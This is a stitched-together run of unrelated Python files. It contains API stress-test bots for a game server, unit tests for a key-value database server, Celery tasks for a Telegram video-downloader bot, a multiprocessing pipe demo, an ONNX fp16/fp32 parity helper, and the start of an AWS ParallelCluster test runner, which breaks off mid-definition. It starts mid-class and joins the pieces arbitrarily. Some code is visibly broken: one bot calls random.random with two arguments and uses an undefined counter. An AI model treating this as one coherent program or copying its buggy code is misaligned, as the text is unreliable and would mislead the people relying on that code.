while time.time()-start < t:
calls += 1
last = time.time()
path, data = randomAPI()
res = self.timedapi(path, data)
assert res[0]
#if not res[0]:
# print('oops',path,data,res[0].json())
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.apiCallTimes = self.pipe[1].recv()
res = self.quit()
return res
# disconnects and connects {rate} times a second
class Discobot(Bot):
def __init__(self, server, rate = 3):
super().__init__(server)
self.rate = rate
self.name = "Discobot"
def generate_output(self,):
return (self.token, self.apiCallTimes)
def run_inner(self, output, t = 3):
calls = 0
start = time.time()
delay = 1.0 / self.rate
while time.time()-start < t:
calls += 1
last = time.time()
assert self.timedapi('disconnect')[0]
resp = self.timedapi('connect')
assert resp[0]
self.token = resp[0].json()['token']
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.token, self.apiCallTimes = self.pipe[1].recv()
res = self.quit()
return res
# sends random garbage API
class Iliteratebot(Bot):
def __init__(self, server, rate):
super().__init__(server)
self.name = 'Iliteratebot'
self.rate = rate
def generate_output(self,):
return (self.apiCallTimes)
def run_inner(self, output, t = 3):
start = time.time()
delay = 1.0 / self.rate
garbage = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(10)])
garbage += '!' # to make sure it is an invalid command
while time.time()-start < t:
last = time.time()
resp = self.timedapi(garbage)
assert not resp[0]
assert 'error' in resp[0].json().keys()
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.apiCallTimes = self.pipe[1].recv()
return self.quit()
# sends no data other than its token
class GDPRbot(Bot):
def __init__(self, server, rate):
super().__init__(server)
self.name = 'GDPRbot'
self.rate = rate
def generate_output(self,):
return (self.apiCallTimes)
def run_inner(self, output, t = 3):
start = time.time()
delay = 1.0 / self.rate
while time.time()-start < t:
last = time.time()
path, data = randomAPI()
res = self.timedapi(path, {})
if path == 'getShipInfo':
assert res[0]
else:
assert not res[0]
assert 'error' in res[0].json().keys()
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.apiCallTimes = self.pipe[1].recv()
res = self.quit()
return res
# so anyway I started blasting
class Spambot(Bot):
def __init__(self, server):
super().__init__(server)
self.name = 'Spambot'
self.spams = 0
def generate_output(self,):
return (self.spams)
def run_inner(self, output, t = 3):
start = time.time()
while time.time()-start < t:
path,data = randomAPI()
data['token'] = self.token
requests.post(url = 'http://' + self.host + ':' + str(self.port) + '/' + path, json=data)
self.spams += 1
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.spams = self.pipe[1].recv()
res = self.quit()
return res
# sends massive Jsons
class Yuugebot(Bot):
def __init__(self, server, numBytes=1024, rate = 3):
super().__init__(server)
self.rate = rate
self.name = 'Yuugebot'
self.bytes = numBytes
self.payload = 0
def generate_output(self):
return (self.apiCallTimes,self.payload)
def run_inner(self, output, t = 3):
calls = [ randomAPI() for i in range(10) ]
for call in range(10):
calls[call][1]['gift'] = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(self.bytes)])
start = time.time()
delay = 1.0 / self.rate
while time.time()-start < t:
last = time.time()
choose = random.randrange(0,10)
res = self.timedapi(calls[choose][0], calls[choose][1])
self.payload += self.bytes
assert res[0]
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.apiCallTimes,self.payload = self.pipe[1].recv()
res = self.quit()
return res
# tries to run away as far as possible
class Coronavirusbot(Bot):
def __init__(self, server, rate = 3):
super().__init__(server)
self.rate = rate
self.name = "Coronavirusbot"
def generate_output(self,):
return (self.apiCallTimes)
def run_inner(self, output, t = 3):
x,y = random.uniform(-1,1)*47,random.random(-1,1)*47
start = time.time()
data = {'x':x,'y':y}
delay = 1.0 / self.rate
while time.time()-start < t:
calls += 1
last = time.time()
resp = self.timedapi('accelerate', data)
assert resp[0]
wait = delay - (time.time() - last)
if wait > 0:
time.sleep(wait)
output.send(self.generate_output())
def finish(self):
if self.p is None:
print("You need to run " + self.name + " before you finish!")
return False
self.p.join()
self.token, self.apiCallTimes = self.pipe[1].recv()
res = self.quit()
return res
|
test_server.py
|
#!/usr/bin/env python3
# pylint: disable=protected-access
# pylint: disable=no-self-use
# pylint: disable=missing-docstring
# pylint: disable=too-many-public-methods
import time
import threading
import unittest
import apocrypha.client
from apocrypha.exceptions import DatabaseError
from apocrypha.server import ServerDatabase, ServerHandler, Server
from test_node import random_query
PORT = 49999
client = apocrypha.client.Client(port=PORT)
def query(args, raw=False):
''' list of string -> string
'''
return client.query(args, interpret=raw)
class TestServerBase(unittest.TestCase):
database = None
server = None
server_thread = None
@classmethod
def setUpClass(cls):
'''
create an Apocrypha instance and server to handle connections
run the server in a thread so test cases may run
'''
# create the ServerDatabase instance, which inherits from Apocrypha
TestServerBase.database = ServerDatabase(
'test/test-db.json',
stateless=True)
# Create the tcp server
host, port = '0.0.0.0', PORT
TestServerBase.server = Server(
(host, port), ServerHandler,
TestServerBase.database, quiet=True)
# start the server
TestServerBase.server_thread = threading.Thread(
target=TestServerBase.server.serve_forever)
TestServerBase.server_thread.start()
TestServerBase.db = apocrypha.client.Client(port=PORT)
@classmethod
def tearDownClass(cls):
'''
shutdown the server
'''
TestServerBase.server.teardown()
TestServerBase.server.socket.close()
TestServerBase.server_thread.join(1)
class TestServer(TestServerBase):
# server tests
# caching
def test_cache_hit(self):
# write operations don't update the cache
query(['pizza', '=', 'sauce'])
self.assertNotIn(('pizza',), TestServer.database.cache)
# get operations do
query(['pizza'])
self.assertIn(('pizza',), TestServer.database.cache)
result = query(['pizza'])
self.assertEqual(result, ['sauce'])
self.assertIn(('pizza',), TestServer.database.cache)
def test_cache_deep_hit(self):
query(['a', '-d'])
query(['a', 'b', 'c', 'd', 'e', '=', 'f'])
query(['a', 'b', 'c', 'd', 'e'])
self.assertIn(
('a', 'b', 'c', 'd', 'e'),
TestServer.database.cache)
@unittest.skip('using simple caching')
def test_cache_invalidate(self):
query(['pizza', '=', 'sauce'])
query(['pizza'])
query([])
self.assertIn(('pizza',), TestServer.database.cache)
self.assertIn((), TestServer.database.cache)
query(['pizza', '-d'])
self.assertNotIn(('pizza',), TestServer.database.cache)
self.assertNotIn((), TestServer.database.cache)
@unittest.skip('using simple caching')
def test_cache_invalidate_parent(self):
'''
changing a child key invalidates all of it's parents
'''
query(['one layer', 'two layer', '=', 'cake'])
query(['one layer', 'two layer'])
self.assertIn(('one layer', 'two layer'), TestServer.database.cache)
query(['one layer'])
self.assertIn(('one layer',), TestServer.database.cache)
# both parent and child are in cache, now change the child and make
# sure the parent is also invalidated
query(['one layer', 'two layer', '=', 'goop'])
self.assertNotIn(('one layer', 'two layer'), TestServer.database.cache)
self.assertNotIn(('one layer',), TestServer.database.cache)
@unittest.skip('using simple caching')
def test_cache_invalidate_child(self):
'''
changing a parent key invalidates all of it's direct children
'''
query(['one layer', 'two layer', '=', 'cake'])
query(['one layer', 'two layer'])
self.assertIn(('one layer', 'two layer'), TestServer.database.cache)
query(['one layer'])
self.assertIn(('one layer',), TestServer.database.cache)
# both parent and child are in cache, now change the parent and make
# sure the child is also invalidated
query(['one layer', '-d'])
self.assertNotIn(('one layer', 'two layer'), TestServer.database.cache)
self.assertNotIn(('one layer',), TestServer.database.cache)
@unittest.skip('unknown issue')
def test_cache_doesnt_effect_sibling(self):
client.delete('one layer')
client.set('one layer', 'two layer', value='cake')
client.set('one layer', 'apple layer', value='sauce')
print(TestServer.database.data)
self.assertEqual(
client.get('one layer', 'two layer'), 'cake')
self.assertEqual(
client.get('one layer', 'apple layer'), 'sauce')
self.assertEqual(
client.get('one layer'),
{'two layer': 'cake', 'apple layer': 'sauce'})
print(TestServer.database.cache)
self.assertIn(('one layer',), TestServer.database.cache)
self.assertIn(('one layer', 'two layer',), TestServer.database.cache)
self.assertIn(('one layer', 'apple layer',), TestServer.database.cache)
def test_cache_top_level_read_operators(self):
'''
make sure --keys, --edit on root are invalidated correctly
'''
pass
def test_cache_top_level_write_operators(self):
'''
writing to root clears the entire cache
'''
pass
def test_cache_write_ops_not_cached(self):
pass
def test_cache_read_ops_are_cached(self):
query(['pizza', '=', 'sauce'])
value = query(['pizza', '--edit'])
self.assertIn(('pizza', '--edit',), TestServer.database.cache)
self.assertEqual(value, ['"sauce"'])
# timing
@unittest.skip('timing not currently supported')
def test_timing(self):
result = query(['-t', 'wolf', 'legs'])
self.assertEqual(result, ['0'])
query(['wolf', 'legs', '=', '4'])
result = query(['-t', 'wolf', 'legs'])
self.assertNotEqual(result, ['0'])
# client tests - query
def test_assign(self):
query(['apple', '=', 'sauce'])
result = query(['apple'])
self.assertEqual(result, ['sauce'])
def test_strict(self):
with self.assertRaises(DatabaseError):
query(['-s', 'gadzooks'])
def test_context(self):
result = query(['-c', '@', 'red'])
self.assertEqual(result, ['sub apple = red'])
def test_query_json_dict(self):
result = query(['octopus'], raw=True)
self.assertEqual(result, {'legs': 8})
self.assertTrue(isinstance(result, dict))
def test_query_json_list(self):
result = query(['colors'], raw=True)
self.assertTrue(isinstance(result, list))
def test_query_json_string(self):
result = query(['apple'], raw=True)
self.assertTrue(isinstance(result, str))
# client tests - Client
def test_get_string(self):
self.assertEqual(
TestServer.db.get('green'), 'nice')
self.assertEqual(
TestServer.db.get('octopus', 'legs'), 8)
# get
def test_get_list(self):
self.assertEqual(
TestServer.db.get('animals'),
['wolf', 'octopus', 'bird'])
def test_get_dict(self):
self.assertEqual(
TestServer.db.get('octopus'),
{'legs': 8})
def test_get_non_existant(self):
self.assertEqual(
TestServer.db.get('yahoo', 'foobar'),
None)
def test_get_default(self):
'''
when a key doesn't exist, default=<something> determines what to
respond with
'''
self.assertEqual(
TestServer.db.get('yahoo', 'foobar', default={}),
{})
self.assertEqual(
TestServer.db.get('yahoo', 'foobar', default=[]),
[])
self.assertEqual(
TestServer.db.get('yahoo', 'foobar', default='abc'),
'abc')
def test_get_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.get('animals', 'octopus')
def test_get_cast_to_list(self):
self.assertEqual(
TestServer.db.get('green', cast=list),
['nice'])
def test_get_cast_to_str(self):
self.assertEqual(
TestServer.db.get('animals', cast=str),
"['wolf', 'octopus', 'bird']")
def test_get_cast_to_set(self):
self.assertEqual(
TestServer.db.get('animals', cast=set),
{'wolf', 'octopus', 'bird'})
def test_get_cast_to_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.get('animals', cast=dict)
# keys
def test_keys(self):
self.assertEqual(
TestServer.db.keys('octopus'), ['legs'])
def test_keys_non_existant(self):
self.assertEqual(
TestServer.db.keys('does not exist', 'foobar'), [])
def test_keys_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.keys('animals', 'octopus')
# remove
def test_remove(self):
TestServer.db.set('test list', value=['a', 'b', 'c'])
TestServer.db.remove('test list', value='a')
self.assertEqual(
TestServer.db.get('test list'),
['b', 'c'])
def test_remove_list(self):
TestServer.db.set('test list', value=['a', 'b', 'c'])
TestServer.db.remove('test list', value=['a', 'b'])
self.assertEqual(
TestServer.db.get('test list'),
'c')
def test_remove_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.remove('octopus', value='sandwich')
def test_remove_type_error(self):
TestServer.db.set('octopus', value={1: 2, 3: 4})
with self.assertRaises(DatabaseError):
TestServer.db.remove('octopus', value='sandwich')
def test_remove_error_top_level(self):
with self.assertRaises(DatabaseError):
TestServer.db.remove(value='key that does not exist')
# append
def test_append(self):
TestServer.db.delete('test list')
TestServer.db.append('test list', value='apple')
self.assertEqual(
TestServer.db.get('test list'),
'apple')
TestServer.db.append('test list', value='blue')
self.assertEqual(
TestServer.db.get('test list'),
['apple', 'blue'])
def test_append_list(self):
TestServer.db.delete('test list')
TestServer.db.append('test list', value=['a', 'b'])
self.assertEqual(
TestServer.db.get('test list'),
['a', 'b'])
TestServer.db.append('test list', value=['c', 'd'])
self.assertEqual(
TestServer.db.get('test list'),
['a', 'b', 'c', 'd'])
def test_append_non_existant(self):
TestServer.db.delete('test list')
TestServer.db.append('test list', value=['a', 'b'])
self.assertEqual(
TestServer.db.get('test list'),
['a', 'b'])
def test_append_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.append('octopus', value='sandwich')
def test_append_type_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.append('octopus', value={'a': 1})
# set
def test_set(self):
TestServer.db.set('test item', value='hello')
value = TestServer.db.get('test item')
self.assertEqual(value, 'hello')
def test_set_list(self):
TestServer.db.set('test list', value=['hello', 'there'])
self.assertEqual(
TestServer.db.get('test list'),
['hello', 'there'])
def test_set_error(self):
with self.assertRaises(DatabaseError):
TestServer.db.set('hello', value=set())
# delete
def test_delete(self):
TestServer.db.set('test item', value='hello')
self.assertEqual(
TestServer.db.get('test item'),
'hello')
TestServer.db.delete('test item')
self.assertEqual(
TestServer.db.get('test item'),
None)
# pop
def test_pop_cast(self):
TestServer.db.set('item', value='hello')
result = TestServer.db.pop('item', cast=list)
self.assertEqual(
result, list('hello'))
def test_pop_bad_cast(self):
TestServer.db.set('item', value='hello')
with self.assertRaises(DatabaseError):
TestServer.db.pop('item', cast=dict)
# apply
def test_apply(self):
TestServer.db.set('list', value=['a', 'a', 'b', 'c'])
TestServer.db.apply('list', func=lambda xs: list(set(xs)))
self.assertEqual(
sorted(TestServer.db.get('list')),
sorted(['a', 'b', 'c']))
# raw query
def test_query(self):
self.assertEqual(
apocrypha.client.query(
['non', 'existant', '--keys'], port=PORT),
[])
def test_fuzz(self):
''' throw a ton of junk at the server and see if it crashes
'''
for _ in range(0, 1000):
random_query(client, debug=False)
def test_lock_stress(self):
''' make a ton of junk queries from several threads
not interested in what the queries do, just that they don't crash the
server
'''
num_requests = 500
num_workers = 10
def worker():
time.sleep(0.1)
for _ in range(0, num_requests):
random_query(client, debug=False)
threads = []
for _ in range(0, num_workers):
threads += [
threading.Thread(target=worker)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
unittest.main()
|
tasks.py
|
#!/usr/local/bin/python3
# coding: utf-8
# ytdlbot - tasks.py
# 12/29/21 14:57
#
__author__ = "Benny <benny.think@gmail.com>"
import logging
import os
import pathlib
import re
import subprocess
import tempfile
import threading
import time
from urllib.parse import quote_plus
import psutil
import requests
from apscheduler.schedulers.background import BackgroundScheduler
from celery import Celery
from celery.worker.control import Panel
from pyrogram import idle
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from client_init import create_app
from config import BROKER, ENABLE_CELERY, ENABLE_VIP, OWNER, WORKERS
from constant import BotText
from db import Redis
from downloader import (convert_flac, edit_text, sizeof_fmt, tqdm_progress,
upload_hook, ytdl_download)
from limit import VIP
from utils import (apply_log_formatter, auto_restart, customize_logger,
get_metadata, get_user_settings)
customize_logger(["pyrogram.client", "pyrogram.session.session", "pyrogram.connection.connection"])
apply_log_formatter()
bot_text = BotText()
logging.getLogger('apscheduler.executors.default').propagate = False
# celery -A tasks worker --loglevel=info --pool=solo
# app = Celery('celery', broker=BROKER, accept_content=['pickle'], task_serializer='pickle')
app = Celery('tasks', broker=BROKER)
celery_client = create_app(":memory:")
def get_messages(chat_id, message_id):
try:
return celery_client.get_messages(chat_id, message_id)
except ConnectionError as e:
logging.critical("WTH!!! %s", e)
celery_client.start()
return celery_client.get_messages(chat_id, message_id)
@app.task()
def ytdl_download_task(chat_id, message_id, url):
logging.info("YouTube celery tasks started for %s", url)
bot_msg = get_messages(chat_id, message_id)
ytdl_normal_download(bot_msg, celery_client, url)
logging.info("YouTube celery tasks ended.")
@app.task()
def audio_task(chat_id, message_id):
logging.info("Audio celery tasks started for %s-%s", chat_id, message_id)
bot_msg = get_messages(chat_id, message_id)
normal_audio(bot_msg)
logging.info("Audio celery tasks ended.")
@app.task()
def direct_download_task(chat_id, message_id, url):
logging.info("Direct download celery tasks started for %s", url)
bot_msg = get_messages(chat_id, message_id)
direct_normal_download(bot_msg, celery_client, url)
logging.info("Direct download celery tasks ended.")
def ytdl_download_entrance(bot_msg, client, url):
if ENABLE_CELERY:
ytdl_download_task.delay(bot_msg.chat.id, bot_msg.message_id, url)
else:
ytdl_normal_download(bot_msg, client, url)
def direct_download_entrance(bot_msg, client, url):
if ENABLE_CELERY:
# TODO disable it for now
direct_normal_download(bot_msg, client, url)
# direct_download_task.delay(bot_msg.chat.id, bot_msg.message_id, url)
else:
direct_normal_download(bot_msg, client, url)
def audio_entrance(bot_msg):
if ENABLE_CELERY:
audio_task.delay(bot_msg.chat.id, bot_msg.message_id)
else:
normal_audio(bot_msg)
def direct_normal_download(bot_msg, client, url):
chat_id = bot_msg.chat.id
headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"}
vip = VIP()
length = 0
if ENABLE_VIP:
remain, _, _ = vip.check_remaining_quota(chat_id)
try:
head_req = requests.head(url, headers=headers)
length = int(head_req.headers.get("content-length"))
except:
length = 0
if remain < length:
bot_msg.reply_text(f"Sorry, you have reached your quota.\n")
return
req = None
try:
req = requests.get(url, headers=headers, stream=True)
length = int(req.headers.get("content-length"))
filename = re.findall("filename=(.+)", req.headers.get("content-disposition"))[0]
except TypeError:
filename = getattr(req, "url", "").rsplit("/")[-1]
except Exception as e:
bot_msg.edit_text(f"Download failed!❌\n\n```{e}```", disable_web_page_preview=True)
return
if not filename:
filename = quote_plus(url)
with tempfile.TemporaryDirectory() as f:
filepath = f"{f}/{filename}"
# consume the req.content
downloaded = 0
for chunk in req.iter_content(1024 * 1024):
text = tqdm_progress("Downloading...", length, downloaded)
edit_text(bot_msg, text)
with open(filepath, "ab") as fp:
fp.write(chunk)
downloaded += len(chunk)
logging.info("Downloaded file %s", filename)
st_size = os.stat(filepath).st_size
if ENABLE_VIP:
vip.use_quota(chat_id, st_size)
client.send_chat_action(chat_id, "upload_document")
client.send_document(bot_msg.chat.id, filepath,
caption=f"filesize: {sizeof_fmt(st_size)}",
progress=upload_hook, progress_args=(bot_msg,),
)
bot_msg.edit_text(f"Download success!✅")
def normal_audio(bot_msg):
chat_id = bot_msg.chat.id
mp4_name = bot_msg.video.file_name # 'youtube-dl_test_video_a.mp4'
flac_name = mp4_name.replace("mp4", "m4a")
with tempfile.NamedTemporaryFile() as tmp:
logging.info("downloading to %s", tmp.name)
celery_client.send_chat_action(chat_id, 'record_video_note')
celery_client.download_media(bot_msg, tmp.name)
logging.info("downloading complete %s", tmp.name)
# execute ffmpeg
celery_client.send_chat_action(chat_id, 'record_audio')
flac_tmp = convert_flac(flac_name, tmp)
celery_client.send_chat_action(chat_id, 'upload_audio')
celery_client.send_audio(chat_id, flac_tmp)
Redis().update_metrics("audio_success")
os.unlink(flac_tmp)
def get_worker_status(username):
worker_name = os.getenv("WORKER_NAME")
try:
me = celery_client.get_me()
mention = me.mention()
except Exception:
mention = "YouTube Downloader"
if worker_name and username == OWNER:
return f"Downloaded by {mention}-{worker_name}"
return f"Downloaded by {mention}"
def ytdl_normal_download(bot_msg, client, url):
chat_id = bot_msg.chat.id
temp_dir = tempfile.TemporaryDirectory()
result = ytdl_download(url, temp_dir.name, bot_msg)
logging.info("Download complete.")
markup = InlineKeyboardMarkup(
[
[ # First row
InlineKeyboardButton( # Generates a callback query when pressed
"audio",
callback_data="audio"
)
]
]
)
if result["status"]:
client.send_chat_action(chat_id, 'upload_document')
video_paths = result["filepath"]
bot_msg.edit_text('Download complete. Sending now...')
for video_path in video_paths:
filename = pathlib.Path(video_path).name
remain = bot_text.remaining_quota_caption(chat_id)
size = sizeof_fmt(os.stat(video_path).st_size)
meta = get_metadata(video_path)
worker = get_worker_status(bot_msg.chat.username)
cap = f"`{filename}`\n\n{url}\n\nInfo: {meta['width']}x{meta['height']} {size} {meta['duration']}s" \
f"\n{remain}\n{worker}"
settings = get_user_settings(str(chat_id))
if settings[2] == "document":
logging.info("Sending as document")
client.send_document(chat_id, video_path,
caption=cap,
progress=upload_hook, progress_args=(bot_msg,),
reply_markup=markup,
thumb=meta["thumb"]
)
else:
logging.info("Sending as video")
client.send_video(chat_id, video_path,
supports_streaming=True,
caption=cap,
progress=upload_hook, progress_args=(bot_msg,),
reply_markup=markup,
**meta
)
Redis().update_metrics("video_success")
bot_msg.edit_text('Download success!✅')
else:
client.send_chat_action(chat_id, 'typing')
tb = result["error"][0:4000]
bot_msg.edit_text(f"Download failed!❌\n\n```{tb}```", disable_web_page_preview=True)
temp_dir.cleanup()
@Panel.register
def hot_patch(*args):
git_path = pathlib.Path().cwd().parent.as_posix()
logging.info("Hot patching on path %s...", git_path)
unset = "/usr/bin/git config --unset http.https://github.com/.extraheader"
pull_unshallow = "/usr/bin/git pull origin --unshallow"
pull = "git pull"
subprocess.call(unset, shell=True, cwd=git_path)
if subprocess.call(pull_unshallow, shell=True, cwd=git_path) != 0:
logging.info("Already unshallow, pulling now...")
subprocess.call(pull, shell=True, cwd=git_path)
logging.info("Code is updated, applying hot patch now...")
psutil.Process().kill()
def run_celery():
argv = [
"-A", "tasks", 'worker', '--loglevel=info',
"--pool=threads", f"--concurrency={WORKERS * 2}",
"-n", f"{os.getenv('WORKER_NAME', '')}"
]
app.worker_main(argv)
if __name__ == '__main__':
celery_client.start()
print("Bootstrapping Celery worker now.....")
time.sleep(5)
threading.Thread(target=run_celery, daemon=True).start()
scheduler = BackgroundScheduler(timezone="Asia/Shanghai")
scheduler.add_job(auto_restart, 'interval', seconds=5)
scheduler.start()
idle()
celery_client.stop()
|
ipc_pipe_half_duplex.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# author: bigfoolliu
"""
使用多进程中的管道,它是半双工的,读写方向不固定
- 只允许具有亲缘关系的两个进程通信
"""
import time
from multiprocessing import Pipe, Process
def func(conn1, conn2):
conn2.close() # 子进程只需使用connection1,故关闭connection2
while True:
try:
msg = conn1.recv() # 无数据则阻塞
print(msg)
except EOFError as e: # 对端关闭后,就无法继续接收了
print(e)
conn1.close()
break
def main():
conn1, conn2 = Pipe() # 建立一个管道,管道返回两个connection
print(f'conn1: {conn1}, conn2, {conn2}')
p = Process(target=func, args=(conn1, conn2,))
p.daemon = True # 子进程必须和主进程一同退出,防止僵尸进程
p.start()
conn1.close() # 主进程只需要一个connection,故关闭一个
for i in range(20):
time.sleep(0.2)
conn2.send('main text') # 主进程发送
conn2.close() # 主进程关闭connection2
if __name__ == '__main__':
main()
|
parity_check_helper.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# This script helps debugging parity issue for two same onnx models with fp16 and fp32 format
# Please build ORT with --cmake_extra_defines onnxruntime_DEBUG_NODE_INPUTS_OUTPUTS=ON
import math
import multiprocessing
import numpy
import os
import torch
from pathlib import Path
from onnx import numpy_helper, TensorProto
from gpt2_helper import Gpt2Helper
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from benchmark_helper import create_onnxruntime_session
NON_ZERO_VALUE = str(1)
ZERO_VALUE = str(0)
def environ_setting_nodes(node_name_filter=None, node_type_filter=None):
# Set I/O data as default
os.environ["ORT_DEBUG_NODE_IO_DUMP_SHAPE_DATA"] = ZERO_VALUE
os.environ["ORT_DEBUG_NODE_IO_DUMP_INPUT_DATA"] = NON_ZERO_VALUE
os.environ["ORT_DEBUG_NODE_IO_DUMP_OUTPUT_DATA"] = NON_ZERO_VALUE
if node_name_filter is not None:
os.environ["ORT_DEBUG_NODE_IO_NAME_FILTER"] = node_name_filter
elif node_type_filter is not None:
os.environ["ORT_DEBUG_NODE_IO_OP_TYPE_FILTER"] = node_type_filter
else:
os.environ["ORT_DEBUG_NODE_IO_DUMPING_DATA_TO_FILES_FOR_ALL_NODES_IS_OK"] = NON_ZERO_VALUE
def environ_setting_paths(output_path):
# Set dumping values to files as default
os.environ["ORT_DEBUG_NODE_IO_DUMP_DATA_DESTINATION"] = "files"
os.environ["ORT_DEBUG_NODE_IO_OUTPUT_DIR"] = output_path
def environ_reset():
for flag in [
"ORT_DEBUG_NODE_IO_DUMP_SHAPE_DATA", "ORT_DEBUG_NODE_IO_DUMP_INPUT_DATA",
"ORT_DEBUG_NODE_IO_DUMP_OUTPUT_DATA", "ORT_DEBUG_NODE_IO_NAME_FILTER", "ORT_DEBUG_NODE_IO_OP_TYPE_FILTER",
"ORT_DEBUG_NODE_IO_DUMP_DATA_TO_FILES", "ORT_DEBUG_NODE_IO_OUTPUT_DIR",
"ORT_DEBUG_NODE_IO_DUMPING_DATA_TO_FILES_FOR_ALL_NODES_IS_OK"
]:
if flag in os.environ:
del os.environ[flag]
def inference(model_path, dummy_inputs, outputs_path, use_gpu):
environ_reset()
environ_setting_nodes()
environ_setting_paths(outputs_path)
session = create_onnxruntime_session(model_path, use_gpu, enable_all_optimization=False)
Gpt2Helper.onnxruntime_inference(session, dummy_inputs)
def generate_outputs_files(model_path, dummy_inputs, outputs_path, use_gpu):
dir_path = Path(outputs_path)
if dir_path.exists() and dir_path.is_dir():
import shutil
shutil.rmtree(outputs_path)
dir_path.mkdir(parents=True, exist_ok=True)
process = multiprocessing.Process(target=inference, args=(model_path, dummy_inputs, outputs_path, use_gpu))
process.start()
process.join()
def post_processing(outputs_path, outputs_path_other):
# Compare outputs with e.g. fp16 and fp32
record = {}
if_close = {}
import glob
for filename in glob.glob(os.path.join(outputs_path, '*.tensorproto')):
filename_other = os.path.join(outputs_path_other, Path(filename).name)
if not os.path.exists(filename_other):
continue
with open(filename, 'rb') as f:
tensor = TensorProto()
tensor.ParseFromString(f.read())
array = numpy_helper.to_array(tensor)
with open(filename_other, 'rb') as f:
tensor_other = TensorProto()
tensor_other.ParseFromString(f.read())
array_other = numpy_helper.to_array(tensor_other)
if array_other.size == 0:
continue
diff = numpy.average(numpy.abs(array_other - array) / (numpy.abs(array_other) + 1e-6))
if math.isnan(diff):
continue
record[Path(filename).name.split(".")[0]] = diff
if_close[Path(filename).name.split(".")[0]] = numpy.allclose(array, array_other, rtol=1e-04, atol=1e-04)
results = [f"Node\tDiff\tClose"]
for k, v in sorted(record.items(), key=lambda x: x[1], reverse=True):
results.append(f"{k}\t{v}\t{if_close[k]}")
for line in results:
print(line)
if __name__ == '__main__':
# Below example shows how to use this helper to investigate parity issue of gpt-2 fp32 and fp16 onnx model
# Please build ORT with --cmake_extra_defines onnxruntime_DEBUG_NODE_INPUTS_OUTPUTS=ON !!
multiprocessing.set_start_method('spawn')
# Generate Inputs
sequence_length = 8
past_sequence_length = 8
batch_size = 5
dummy_inputs_fp16 = Gpt2Helper.get_dummy_inputs(batch_size,
past_sequence_length,
sequence_length,
12,
768,
12,
50257,
device=torch.device("cpu"),
float16=True)
dummy_inputs_fp32 = dummy_inputs_fp16.to_fp32()
# Get GPT-2 model from huggingface using convert_to_onnx.py
os.system('python convert_to_onnx.py -m gpt2 --output gpt2_fp32.onnx -o -p fp32 --use_gpu')
os.system('python convert_to_onnx.py -m gpt2 --output gpt2_fp16.onnx -o -p fp16 --use_gpu')
# Specify the directory to dump the node's I/O
outputs_path_fp32_gpu = "./fp32_gpu"
outputs_path_fp16_gpu = "./fp16_gpu"
generate_outputs_files("./gpt2_fp32.onnx", dummy_inputs_fp32, outputs_path_fp32_gpu, use_gpu=True)
generate_outputs_files("./gpt2_fp16.onnx", dummy_inputs_fp16, outputs_path_fp16_gpu, use_gpu=True)
# Compare each node's I/O value and sort based on average rtol
post_processing(outputs_path_fp16_gpu, outputs_path_fp32_gpu)
|
test_runner.py
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.
# See the License for the specific language governing permissions and limitations under the License.
import datetime
import logging
import multiprocessing
import os
import sys
import time
from tempfile import TemporaryDirectory
import argparse
import pytest
from reports_generator import generate_cw_report, generate_json_report, generate_junitxml_merged_report
logger = logging.getLogger()
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(module)s - %(message)s", level=logging.INFO)
START_TIME = time.time()
START_TIME_ISO = datetime.datetime.fromtimestamp(START_TIME).isoformat()
LOGS_DIR = "{0}.logs".format(START_TIME)
OUT_DIR = "{0}.out".format(START_TIME)
TEST_DEFAULTS = {
"parallelism": None,
"retry_on_failures": False,
"features": "", # empty string means all
"regions": [
"us-east-1",
"us-east-2",
"us-west-1",
"us-west-2",
"ca-central-1",
"eu-west-1",
"eu-west-2",
"eu-central-1",
"ap-southeast-1",
"ap-southeast-2",
"ap-northeast-1",
"ap-south-1",
"sa-east-1",
"eu-west-3",
],
"oss": ["alinux", "centos6", "centos7", "ubuntu1404", "ubuntu1604"],
"schedulers": ["sge", "slurm", "torque", "awsbatch"],
"instances": ["c4.xlarge", "c5.xlarge"],
"dry_run": False,
"reports": [],
"cw_region": "us-east-1",
"cw_namespace": "ParallelCluster/IntegrationTests",
"sequential": False,
"output_dir": "tests_outputs",
"custom_node_url": None,
"custom_cookbook_url": None,
